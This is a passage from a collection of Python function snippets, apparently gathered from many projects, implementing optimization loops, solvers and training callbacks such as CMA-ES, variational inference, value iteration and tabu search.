_solver, _stepmon, _evalmon = results.pop()\n sm = Monitor()\n sm._x,sm._y,sm._id,sm._info = _stepmon\n _solver._stepmon.extend(sm)\n del sm\n em = Monitor()\n em._x,em._y,em._id,em._info = _evalmon\n _solver._evalmon.extend(em)\n del em\n self._allSolvers[len(results)] = _solver\n del results, _solver, _stepmon, _evalmon\n #XXX: END HACK\n\n # get the results with the lowest energy\n self._bestSolver = self._allSolvers[0]\n bestpath = self._bestSolver._stepmon\n besteval = self._bestSolver._evalmon\n self._total_evals = self._bestSolver.evaluations\n for solver in self._allSolvers[1:]:\n self._total_evals += solver.evaluations # add func evals\n if solver.bestEnergy < self._bestSolver.bestEnergy:\n self._bestSolver = solver\n bestpath = solver._stepmon\n besteval = solver._evalmon\n\n # return results to internals\n self.population = self._bestSolver.population #XXX: pointer? copy?\n self.popEnergy = self._bestSolver.popEnergy #XXX: pointer? copy?\n self.bestSolution = self._bestSolver.bestSolution #XXX: pointer? copy?\n self.bestEnergy = self._bestSolver.bestEnergy\n self.trialSolution = self._bestSolver.trialSolution #XXX: pointer? copy?\n self._fcalls = self._bestSolver._fcalls #XXX: pointer? copy?\n self._maxiter = self._bestSolver._maxiter\n self._maxfun = self._bestSolver._maxfun\n\n # write 'bests' to monitors #XXX: non-best monitors may be useful too\n self._stepmon = bestpath #XXX: pointer? copy?\n self._evalmon = besteval #XXX: pointer? copy?\n self.energy_history = None\n self.solution_history = None\n #from mystic.tools import isNull\n #if isNull(bestpath):\n # self._stepmon = bestpath\n #else:\n # for i in range(len(bestpath.y)):\n # self._stepmon(bestpath.x[i], bestpath.y[i], self.id)\n # #XXX: could apply callback here, or in exec'd code\n #if isNull(besteval):\n # self._evalmon = besteval\n #else:\n # for i in range(len(besteval.y)):\n # self._evalmon(besteval.x[i], besteval.y[i])\n #-------------------------------------------------------------\n\n # restore default handler for signal interrupts\n if self._handle_sigint:\n signal.signal(signal.SIGINT,signal.default_int_handler)\n\n # log any termination messages\n msg = self.Terminated(disp=disp, info=True)\n if msg: self._stepmon.info('STOP(\"%s\")' % msg)\n # save final state\n self._AbstractSolver__save_state(force=True)\n return", "def run(self):\n # print(\"111\"+\"--- %s seconds ---\" % (time.time() ))\n err = self.params.tolerance + 1\n for iter_num in range(self.params.max_iter):\n if err <= self.params.tolerance:\n break\n # print(\"11\"+str(iter_num)+\"--- %s seconds ---\" % (time.time() - start_time))\n qprev = self.sigma2\n\n self._expectation_iter(iter_num)\n self._maximization_iter(iter_num)\n\n if self.sigma2 <= 0:\n self.sigma2 = self.params.tolerance / 10\n err = np.abs(self.sigma2 - qprev)\n\n if callable(self.callback):\n kwargs = {\n 'iteration': iter_num,\n 'error': err,\n 'X': self.X,\n 'Y': self.TY,\n 'W': self.W,\n 'P': self.P\n }\n self.callback(**kwargs)\n return self.TY", "def opt_wrapper(m, **kwargs):\n m.optimize(**kwargs)\n return m.optimization_runs[-1]", "def Optimize(self):\n return _gmat_py.Optimizer_Optimize(self)", "def optimize(cls, trials, score, evals_rounds, mon_cons, categorical):\n raise NotImplementedError", "def optimize(self, objectivefct, logger=None, verb_disp=20, iterations=None):\r\n if logger is None:\r\n if hasattr(self, 'logger'):\r\n logger = self.logger\r\n\r\n citer = 0\r\n while not self.stop():\r\n if iterations is not None and citer >= iterations:\r\n return self.result()\r\n citer += 1\r\n\r\n X = self.ask() # deliver candidate solutions\r\n fitvals = [objectivefct(x) for x in X]\r\n self.tell(X, fitvals) # all the work is done here\r\n\r\n self.disp(verb_disp)\r\n logger.add(self) if logger else None\r\n\r\n logger.add(self, modulo=bool(logger.modulo)) if logger else None\r\n if verb_disp:\r\n self.disp(1)\r\n if verb_disp in (1, True):\r\n print('termination by', self.stop())\r\n print('best f-value =', self.result()[1])\r\n print('solution =', self.result()[0])\r\n\r\n return self.result() + (self.stop(), self, logger)", "def run_optimization(config,\n blackbox_optimizer,\n init_current_input,\n init_best_input,\n init_best_core_hyperparameters,\n init_best_value,\n init_iteration,\n workers,\n log_bool=False):\n current_input = init_current_input\n best_input = init_best_input\n best_core_hyperparameters = init_best_core_hyperparameters\n best_value = [init_best_value]\n iteration = init_iteration\n\n while True:\n print(iteration)\n sys.stdout.flush()\n success, current_input = run_step_rpc_blackbox_optimizer(\n config, current_input, blackbox_optimizer, workers, iteration,\n best_input, best_core_hyperparameters, best_value, log_bool)\n if success:\n iteration += 1\n if iteration == config.nb_iterations:\n break", "def iterate(self, update_func):\n if self.disc_param_save_on_error:\n update_func = param_file.wrap_with_save_on_error(\n self.gan.discriminator,\n self.datastore.path('disc_param', 'pre_error.npz'),\n self.datastore.path('disc_param', 'post_error.npz'),\n )(update_func)\n\n self.pre_loop()\n logger.info('%s: start iterations', self.__class__.__name__)\n with recording_exit_reason(self.datastore):\n for gen_step in range(self.iterations):\n self.post_update(gen_step, update_func(gen_step))\n logger.info('%s: maximum iterations reached', self.__class__.__name__)", "def __call__(self, fgraph):\r\n return self.optimize(fgraph)", "def step(self, closure=None):\n orig_loss,err,pred = closure()\n loss = orig_loss\n\n group = self.param_groups[0]\n lr = group['lr']\n decay_lr = group['decay_lr']\n max_iter = group['max_iter']\n reg = group['reg']\n backtrack = group['backtrack']\n bt_alpha = group['bt_alpha']\n bt_beta = group['bt_beta']\n sketch_size = group['sketch_size']\n tolerance = group['tolerance']\n\n #import pdb; pdb.set_trace()\n n = err.shape[0] #batch size\n #If sketching the jacobian, randomly select [sketch_size] samples\n \n if sketch_size is not None:\n idx = torch.randperm(n)[:sketch_size]\n else:\n idx = torch.arange(n) #Don't sketch, use all samples\n \n w0 = nn.utils.parameters_to_vector(self._params) #weight parameters in vector form\n \n #Compute Gauss-Newton vector product \n grad, ggnvp = _make_ggnvp(err,self._params,w0,n,reg,idx) #return gradient in vector form + ggnvp function\n #Solve for the Conjugate Gradient Direction\n dw, cost_log = _conjugate_gradient(ggnvp, grad, max_iter, tolerance)\n\n #Perform backtracking line search\n val = loss + 0.5 * reg * torch.norm(w0)**2\n fprime = -1*dw @ grad\n \n self.grad_update += 1\n if backtrack > 0:\n t = lr\n\n #TODO: If using backtracking, get new loss with (w0 - t*dw) as network parameters\n bts = 0\n alpha = bt_alpha\n beta = bt_beta \n while (loss + 0.5 * reg * torch.norm(w0 - t*dw)**2 > val + alpha * t * fprime):\n t = beta * t\n bts += 1\n if bts > backtrack:\n print('Maximum backtracking reached, accuracy not guaranteed')\n break\n elif decay_lr: #decay lr\n t = lr/np.maximum(1, self.grad_update-10)\n else: #use lr step-size\n t = lr\n\n print('step size: {}'.format(t))\n\n #Update the model parameters\n self._add_grad(-t, dw)\n \n return val, pred", "def callback(self, parameters):\n print(\"\\nFinsished Iteration: {}\".format(self.current_iteration), flush=True)\n print(\"Current Parameters: {}\".format(parameters), flush=True)\n\n # If getting the value history, perform an evaluation with current parameters\n\n print(\"Starting Next Iteration...\", flush=True)\n\n # Update currrent_iteration index and add new blank history\n self.current_iteration += 1", "def do_optimisation(self):\n\n print('--> Parameters for optimisation:')\n print('--> Using measurements : {}'.format(self.stoma_cfg.comparison_helper.optimisation_keys))\n print('')\n\n x0 = self.initial_guess()\n\n tol, eps = 1e-4, 0.001\n\n print('--> Using SLSQP with tol={} and eps={}'.format(tol, eps))\n\n soln = opt.minimize(fun=self.optimise_fn,\n x0=x0,\n method='SLSQP',\n tol=tol,\n options={'eps': eps})\n\n print('*' * 120)\n print('--> Optimisation procedure has finished...')\n print(soln)\n print('*' * 120)\n\n if soln.success:\n print('--> Optimisation succeeded. Result is...')\n self._set_material_parameters(soln.x)\n print('--> {}'.format(self.material_model))\n else:\n print('--> The optimisation failed!')\n\n print('*' * 120)\n\n return soln", "def VFI(method) :\n iteration=0 # Iteration Counter\n converged = 0 # Convergence Flag|\n \n#----- Initial Settings \n v_update = zeros(n_grid)\n v_func = empty(n_grid)\n k_next_vec = empty(n_grid)\n run_time = empty(2)\n \n def obj(k_next) :\n \"\"\"\n This function is used in value function iteration.\n It represents the objective function to be maximized for one node (state) of current capitals.\n Resulting value is maximized one corresponding to next period's capital as a maximizer. \n Next period's value is computed by interpolation.\n \n Input : k_next (next period's capital)\n \n Output : value_vec (maximized value resulting from choosing optimal capital in the next period)\n \"\"\" \n \n if method==1 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*linear_interp(k_grid,v_update,k_next))\n elif method==2 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*quad_interp(k_grid,v_update,k_next))\n elif method==3 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*cubic_interp(k_grid,v_update,k_next))\n \n return value_vec\n\n#----- Value function iteration\n start = time.time() # start time\n while converged==0 :\n index = 0\n for k_current in k_grid :\n k_next = fminbound(obj,k_grid[0],k_grid[-1])\n v_func[index] = (-1) * obj(k_next)\n k_next_vec[index] = k_next\n index = index + 1\n dist = abs(max(v_func - v_update))\n if dist<tol :\n converged = 1\n v_k, g_k = v_func, k_next_vec\n v_update = v_func\n print \"Iteration : \",iteration,\"\",\"Distance : \",dist # convergence process\n iteration = iteration + 1\n v_func = empty(n_grid) \n k_next_vec = empty(n_grid)\n \n end = time.time() # end time\n run_time[0],run_time[1] = runtime_cal(start,end) # total running time\n \n return v_k, g_k, run_time, iteration", "def run(self):\n\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient, 2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n x = self.draw_normal()\n gradient = self.cv_gradient(x)\n gradient[np.isnan(gradient)] = 0\n self.change_parameters(self.optim.update(gradient))\n\n if self.printer is True:\n self.print_progress(i, self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.full_neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, elbo_records", "def run(self):\n\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient, 2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n x = self.draw_normal()\n gradient = self.cv_gradient(x)\n gradient[np.isnan(gradient)] = 0\n self.change_parameters(self.optim.update(gradient))\n\n if self.printer is True:\n self.print_progress(i, self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, elbo_records", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def intermediate(self, alg_mod, iter_count, obj_value,\n inf_pr, inf_du, mu, d_norm, regularization_size,\n alpha_du, alpha_pr, ls_trials):\n # TODO: Document the arguments\n pass", "def _function(self):\n\n\n\n def calculate_weights():\n \"\"\"\n calculate a weight inversely proportional to the expected to duration of the two steps in the\n script\n\n Returns: weights as a dictionary for the two steps\n\n \"\"\"\n weights = {}\n\n\n # estimate run time of step 1 (fast sweep)\n f_range = sweeper_script.settings['stop'] - sweeper_script.settings['start']\n N_samples = sweeper_script.settings['samplecount']\n df = f_range / N_samples\n\n t = N_samples / df\n\n weights['quick scan'] = t\n\n # estimate run time of step 2 (high res sweep)\n df = self.settings['high_res_df']\n N_samples = self.settings['high_res_N']\n\n t = N_samples / df\n\n weights['high res scan'] = t\n\n\n total_time = sum([v for k, v in weights.iteritems()])\n\n weights = {k: v/total_time for k, v in weights.iteritems()}\n\n print('weights',weights)\n\n return weights\n\n def run_scan(name):\n self.current_subscript = name\n sweeper_script.start()\n while self.current_subscript is name:\n time.sleep(0.1)\n\n def calc_new_range():\n\n\n df = self.settings['high_res_df']\n N = self.settings['high_res_N']\n\n r = sweeper_script.data[-1]['r']\n freq = sweeper_script.data[-1]['frequency']\n freq = freq[np.isfinite(r)]\n r = r[np.isfinite(r)]\n\n fo = freq[np.argmax(r)]\n\n f_start, f_end = fo - N/2 *df, fo + N/2 *df\n\n\n # make sure that we convert back to native python types (numpy file types don't pass the Parameter validation)\n return float(f_start), float(f_end), int(N)\n\n\n sweeper_script = self.scripts['zi sweep']\n #save initial settings, so that we can rest at the end of the script\n initial_settings = deepcopy(sweeper_script.settings)\n self.weights = calculate_weights()\n\n # take the signal from the subscript and route it to a function that takes care of it\n sweeper_script.updateProgress.connect(self._receive_signal)\n\n print('====== start quick scan ============')\n\n run_scan('quick scan')\n\n print('====== calculate new scan range ====')\n f_start, f_stop, N = calc_new_range()\n\n print('f_start, f_stop, N', f_start, f_stop, N)\n\n print('====== update sweeper ==============')\n sweeper_script.update({\n 'start' : f_start,\n 'stop' : f_stop,\n 'samplecount' : N\n })\n\n print('====== start high res scan =========')\n # print(sweeper_script.sweeper.finished())\n # print(sweeper_script.sweeper.progress())\n\n run_scan('high res scan')\n\n sweeper_script.updateProgress.disconnect()\n self.data = sweeper_script.data[-1]\n\n self._recording = False\n\n if self.settings['save']:\n self.save()\n\n # set the sweeper script back to initial settings\n sweeper_script.update(initial_settings)\n # make sure that progess is set 1o 100 because we check that in the old_gui\n self.updateProgress.emit(100)", "def run(self):\n if not self._no_progress and self._verbose:\n from progressbar import ProgressBar\n progress = ProgressBar()\n iter_range = progress(range(self._iters))\n else:\n iter_range = range(self._iters)\n\n if self._no_progress and self._time_iters:\n from time import time\n\n i = 0\n try:\n for i in iter_range:\n if self._verbose and self._no_progress:\n print(\"Iteration \" + repr(i))\n\n if self._no_progress and self._time_iters:\n start = time()\n\n self.iteration += 1\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n if self._double:\n update_m_double(self._m, alpha_k, self._p_k)\n sub_scaled_vector_double(self._residual_k,\n self._residual_k,\n alpha_k, self._v_k)\n else:\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k,\n alpha_k, self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n print(\"Converged.\")\n self.converged = True\n break\n\n if self._double:\n add_scaled_vector_double(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n else:\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k, self._p_k)\n\n self._rho_k = rho_k_plus_1\n\n if self._noisy:\n print(\" Residual=\" + str(rho_k_t))\n\n if self._no_progress and self._time_iters:\n print(\"Elapsed time for iteration \" + str(i) + \": \" +\n str(time() - start) + \" seconds\")\n\n if self._save_images:\n save_image(np.abs(self._m.get().reshape(self._data.nX1,\n self._data.nX2)),\n self._out_dir, i, self._image_format)\n if self._save_matlab:\n save_matlab(self._m.get().reshape(self._data.nX1,\n self._data.nX2),\n self._out_dir, i)\n except KeyboardInterrupt:\n print(\"Reconstruction aborted (CTRL-C) at iteration \" + str(i))\n finally:\n if self._save_images:\n save_image(np.abs(self._m.get().reshape(self._data.nX1,\n self._data.nX2)),\n self._out_dir, \"result\", self._image_format)\n if self._save_matlab:\n save_matlab(self._m.get().reshape(self._data.nX1,\n self._data.nX2),\n self._out_dir, \"result\")\n self.iteration = i+1\n return (self._m.get().reshape(self._data.nX1, self._data.nX2),\n self.iteration)", "def update():\n global iteration, result\n iteration += 1\n # Stop iterating after max_iterations\n if iteration >= max_iterations:\n timer.stop()\n print \"Output is\", result\n else:\n result = get_next(result)", "def objective(hyperparams): \n global iteration #necessary with a global variable because of implementation from hyperopt. \n iteration += 1\n\n result = run_model(hyperparams, iteration)\n loss = -result #transform to loss in order to minimize\n\n return {'loss': loss, 'hyperparams': hyperparams, 'iteration': iteration, 'status': STATUS_OK}", "def on_iteration_start(self):\n\n self.Xprv = self.X.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yprv = self.Y.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn", "def fit(self):\n self._minuit_problem.migrad() # run optimizer\n self._status = 0 if self._minuit_problem.migrad_ok() else 1", "def optimize(self,max_iter=100):\n\n\n for itr in range(max_iter):\n opt_logs = self.opt.minimize(self.tot_neg_elbo,sum([expert.trainable_variables for expert in self.experts],())) \n print(self.neg_elbo)", "def optimize(self):\n prm = (self.b,self.c)\n d = self.d\n no = int(d*d)\n bounds = [(-1,1)]*no\n resG = differential_evolution(inpSc.entBias, bounds, args = prm, popsize = 40, disp = False)\n\n xOpt = resG.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n\n #Refine the global optimization by performing a second local optimizaiton\n x0 = xOpt\n\n res = minimize(inpSc.entBias, x0, args = prm, method='BFGS', options={'disp': False})\n xOpt = res.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n self.rhoOp = inpSc.getMat(xOpt, d)\n self.Q1 = -res.fun", "def search(self):\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())", "def run_step_blackbox_optimizer(config,\n current_input,\n blackbox_optimizer,\n proposed_perturbations,\n finished_dnas,\n results,\n logging_data=None):\n core_hyperparameters = blackbox_optimizer.get_hyperparameters()\n function_values = [0.0] * len(proposed_perturbations)\n rewards_for_controller = []\n perturbations = proposed_perturbations\n evaluation_stats = []\n current_value_exact = 0.0\n current_value_exact_counter = 0\n\n for i in range(len(results)):\n rewards_for_controller.append(results[i]['function_value'])\n tag = results[i]['tag']\n index = 0\n if tag > 0:\n if config.est_type == 'antithetic':\n index = (tag - 1) * 2\n function_values[index] += results[i]['function_value']\n else:\n index = tag - 1\n function_values[index] += results[i]['function_value']\n if tag < 0:\n index = (-tag - 1) * 2 + 1\n function_values[index] += results[i]['function_value']\n if tag == 0:\n current_value_exact += results[i]['function_value']\n current_value_exact_counter += 1\n current_value_exact /= float(current_value_exact_counter)\n\n for result in results:\n evaluation_stat = list(result['evaluation_stat'])\n evaluation_stats.append(evaluation_stat)\n\n function_values_reshaped = np.array(function_values)\n perturbations_reshaped = np.array(perturbations)\n\n logging.info('LIST OF FUNCTION VALUES')\n logging.info(function_values_reshaped)\n\n logging.info('MAX VALUE SEEN CURRENTLY')\n logging.info(np.max(function_values_reshaped))\n\n logging.info('MEAN OF VALUES')\n logging.info(np.mean(function_values_reshaped))\n\n if logging_data is not None:\n iteration = logging_data['iteration']\n best_value = logging_data['best_value']\n iteration = logging_data['iteration']\n best_input = logging_data['best_input']\n best_core_hyperparameters = logging_data['best_core_hyperparameters']\n optimizer_state = blackbox_optimizer.get_state()\n\n if current_value_exact > best_value[0]:\n best_value[0] = current_value_exact\n best_input = current_input\n best_core_hyperparameters = core_hyperparameters\n\n # Writing logs.\n if iteration % config.log_frequency == 0:\n util.log_row(config.params_file, current_input)\n util.log_row(config.best_params_file, best_input)\n util.log_row(config.best_core_hyperparameters_file,\n best_core_hyperparameters)\n util.log_row(config.best_value_file, best_value)\n util.log_row(config.optimizer_internal_state_file, optimizer_state)\n util.log_row(config.current_values_list_file, [current_value_exact])\n util.log_row(config.best_values_list_file, [best_value[0]])\n util.log_row(config.fvalues_file, function_values_reshaped)\n util.log_row(config.iteration_file, [iteration])\n\n print('Current exact value estimate:')\n print(current_value_exact)\n sys.stdout.flush()\n\n new_current_input = blackbox_optimizer.run_step(perturbations_reshaped,\n function_values_reshaped,\n current_input,\n current_value_exact)\n config.controller.collect_rewards_and_train(rewards_for_controller,\n finished_dnas)\n\n evaluation_stats_reduced = [sum(x) for x in zip(*evaluation_stats)]\n blackbox_optimizer.update_state(evaluation_stats_reduced)\n\n return [True, new_current_input]", "def optimize(self): \n if self.model == 'ARD':\n estimate = minimize(\n fun=optim_func,\n x0=np.array([self.alpha, self.beta]),\n args=(self,),\n method='L-BFGS-B',\n bounds=((0, 50), (0, 50)),\n )\n # logger.info(estimate)\n\n # organize into a dict\n result = {\n \"alpha\": estimate.x[0],\n \"beta\": estimate.x[1],\n \"Lik\": estimate.fun,\n \"negLogLik\": -np.log(-estimate.fun),\n \"convergence\": estimate.success,\n }\n logger.debug(result)\n\n elif self.model == 'ER':\n estimate = minimize(\n fun=optim_func,\n x0=np.array([self.alpha]),\n args=(self,),\n method='L-BFGS-B',\n bounds=[(0, 50)],\n )\n\n result = {\n \"alpha\": estimate.x[0],\n \"Lik\": estimate.fun, \n \"negLogLik\": -np.log(-estimate.fun),\n \"convergence\": estimate.success,\n }\n logger.debug(result)\n\n else:\n raise Exception('model must be specified as either ARD or ER')\n\n # get scaled likelihood values\n self.log_lik = result[\"negLogLik\"]\n self.tree = self.tree.set_node_values(\n 'likelihood',\n values={\n node.idx: np.array(node.likelihood) / sum(node.likelihood)\n for node in self.tree.idx_dict.values()\n }\n )", "def iterate_value(self):\n self.V = np.zeros(self.stateCount)\n for i in range(self.maxIter):\n last_V = np.copy(self.V)\n for state_index in range(self.stateCount):\n current_state = self.env.statespace[state_index]\n for action in self.env.actionspace:\n next_state = self.env.next_state(current_state,action)\n reward = self.env.compute_reward(next_state)\n next_state_index = self.env.stateDict[next_state]\n self.Q[state_index][action] = reward + self.gamma*last_V[next_state_index]\n if self.mode == 'debug':\n print(\"Q(s={}):{}\".format(current_state,self.Q[state_index]))\n self.V[state_index] = max(self.Q[state_index])\n if np.sum(np.fabs(last_V - self.V)) <= self.th:\n print (\"Convergene Achieved in {}th iteration. \"\n \"Breaking V_Iteration loop!\".format(i))\n break", "def optimize(self, ngen):\n res = 0\n for res in self(ngen):\n pass\n return res", "def on_iteration_start(self):\n\n self.Xfprv = self.Xf.copy()\n if (not self.opt['FastSolve'] or isinstance(self.backtrack,\n BacktrackRobust)):\n self.Yfprv = self.Yf.copy()\n\n if self.opt['Monotone']:\n if self.k == 0:\n self.objfn = self.eval_objfn()\n self.objfn_prev = self.objfn", "def run(self):\n\n # init\n base_value = self._problem.evaluate()\n self._problem.set_as_best(base_value)\n\n # init iteration (used to count the amount of iterations)\n iteration = 0\n\n # add to data\n self._data_append(self.data, iteration, base_value, base_value)\n\n # init termination criterion\n self._termination_criterion.check_first_value(base_value)\n self._termination_criterion.start_timing()\n\n # main loop\n while self._termination_criterion.keep_running():\n\n # search the neighbourhood for the best move\n best_found_delta = self._best_found_delta_base_value\n best_found_move = None\n\n for move in self._problem.get_moves():\n\n # check quality move\n delta = self._problem.evaluate_move(move)\n\n # checks how the move alters the current state\n diff = self._diff(move)\n\n # if not in tabu list --> not similar to earlier performed\n # moves --> if delta better than old best move\n # --> becomes the best move\n\n if not self._tabu_list.contains(diff) and \\\n self._is_better(best_found_delta, delta):\n best_found_delta = delta\n best_found_move = move\n best_found_diff = diff\n\n # the best found move will be used as the next move\n # alter state problem\n base_value = base_value + best_found_delta\n\n # check if a move was found\n if best_found_move is not None:\n\n self._problem.move(best_found_move)\n\n # if better than best found --> new best_found\n if self._is_better(self._problem.best_order_value,\n base_value):\n self._problem.set_as_best(base_value)\n # log the better solution\n self._log_improvement(base_value)\n\n # add diff to tabu list\n self._tabu_list.add(best_found_diff)\n\n # add to data\n self._data_append(self.data, iteration,\n base_value, self._problem.best_order_value)\n\n self._termination_criterion.check_new_value(base_value)\n\n # functions _termination_criterion called\n self._termination_criterion.check_new_value(base_value)\n\n else:\n # no move found --> we're stuck --> break loop\n break\n\n iteration += 1\n self._termination_criterion.iteration_done()\n\n # last data point\n self._data_append(self.data, iteration, base_value,\n self._problem.best_order_value)\n\n # if we have data:\n # convert data to something easier to plot\n if self.data is not None:\n\n # convert to tuple of list\n data = convert_data(self.data)\n\n # make namedtuple\n DataAsLists = namedtuple(\n 'Data', ['time', 'iteration', 'value', 'best_value'])\n\n data = DataAsLists(data[0], data[1], data[2], data[3])\n\n else:\n data = None\n\n # return results\n\n Results = namedtuple('Results', ['best_order', 'best_value', 'data'])\n\n return Results(self._problem.best_order,\n self._problem.best_order_value,\n data)", "def compute_gradient(self, verbose):\n from inversionson.helpers.autoinverter_helpers import IterationListener\n\n # Attempt to dispatch model smoothing right at the beginning.\n # So there is no smoothing bottleneck when updates are not smoothed.\n it_listen = IterationListener(\n self.comm,\n events=self.comm.project.events_in_iteration)\n it_listen.listen()\n\n self.task_dict[\"forward_submitted\"] = True\n self.task_dict[\"misfit_completed\"] = True\n self.task_dict[\"gradient_completed\"] = True\n self._update_task_file()\n self.finish_task()", "def solve(self, regparam):\n self.regparam = regparam\n \n #Some counters for bookkeeping\n self.stepcounter = 0\n self.flipcounter = 0\n self.nochangecounter = 0\n \n #Cached results\n self.evals = np.multiply(self.svals, self.svals)\n self.newevals = 1. / (self.evals + self.regparam)\n newevalslamtilde = np.multiply(self.evals, self.newevals)\n self.D = np.sqrt(newevalslamtilde)\n #self.D = -newevalslamtilde\n \n self.VTY = self.svecs.T * self.Y\n DVTY = np.multiply(self.D.T, self.svecs.T * self.Y)\n \n #Using lists in order to avoid unnecessary matrix slicings\n self.DVTY_list = []\n self.YTVDDVTY_list = []\n self.classFitnessList = []\n for i in range(self.labelcount):\n DVTY_i = DVTY[:,i]\n self.DVTY_list.append(DVTY_i)\n YTVDDVTY_i = DVTY_i.T * DVTY_i\n self.YTVDDVTY_list.append(YTVDDVTY_i)\n fitness_i = self.size - DVTY_i.T * DVTY_i\n self.classFitnessList.append(fitness_i)\n \n self.Dsvecs_list = []\n self.svecsDDsvecs_list = []\n for i in range(self.size):\n Dsvec = np.multiply(self.D.T, self.svecs[i].T)\n self.Dsvecs_list.append(Dsvec)\n self.svecsDDsvecs_list.append(Dsvec.T*Dsvec)\n \n self.updateA()\n \n \n converged = False\n print(self.classcounts.T)\n if self.callbackfun is not None:\n self.callbackfun.callback(self)\n while True:\n \n converged = self.roundRobin()\n print(self.classcounts.T)\n if self.callbackfun is not None:\n self.callbackfun.callback(self)\n if converged: break\n \n if self.oneclass:\n self.Y = self.Y[:, 0]\n self.A = self.A[:, 0]\n self.results['predicted_clusters_for_training_data'] = self.Y\n self.predictor = self.svdad.createModel(self)", "def step(self, closure: Callable = None):\n loss = self.optimizer.step(closure)\n self._k_counter += 1\n\n if self._k_counter >= self.k:\n self._k_counter = 0\n # Lookahead and cache the current optimizer parameters\n for group in self.optimizer.param_groups:\n for p in group[\"params\"]:\n param_state = self.state[p]\n p.data.mul_(self.alpha).add_(\n param_state[\"slow_params\"], alpha=1.0 - self.alpha\n )\n param_state[\"slow_params\"].copy_(p.data)\n return loss", "def callback(_locals, _globals):\n global n_steps, best_mean_reward\n # Print stats every 1000 calls\n if (n_steps + 1) % 1000 == 0:\n # Evaluate policy training performance\n x, y = ts2xy(load_results(log_dir), 'timesteps')\n if len(x) > 0:\n mean_reward = np.mean(y[-100:])\n print(x[-1], 'timesteps')\n print(\"Best mean reward: {:.2f} - Last mean reward per episode: {:.2f}\".format(best_mean_reward, mean_reward))\n\n # New best model, you could save the agent here\n if mean_reward > best_mean_reward:\n best_mean_reward = mean_reward\n # Example for saving best model\n print(\"Saving new best model\")\n _locals['self'].save(log_dir + str(x[-1])+'best_model.pkl')\n n_steps += 1\n return True", "def optimize(self, num_restarts=1, max_iters=100, max_f_eval=300.0, method='Anneal'):\n dic = DictVectorizer()\n # flatten the parameters\n init_params,bounds=dic.fit_transform(self.params)\n #we minimise minus the marginal likelihood\n def objective(params_flatten):\n self.params=dic.inverse_transform(params_flatten,bounds)\n val = -self.log_marginal_likelihood()\n return val# we want to maximize it\n \n \n #run ptimisation with multiple restarts\n optml=np.inf\n for i in range(num_restarts):\n #minimise function\n if method=='Anneal':\n res=dual_annealing(objective,bounds, maxiter=max_iters, maxfun=max_f_eval, x0=init_params)\n else:\n \n res = minimize(objective, init_params, \n bounds=bounds, method=method,options={'maxiter': max_iters, 'disp': False})\n #print(\"Iteration \"+str(i)+\" \",-res.fun)\n if res.fun<optml:\n params_best=res.x #init_params \n optml=res.fun\n 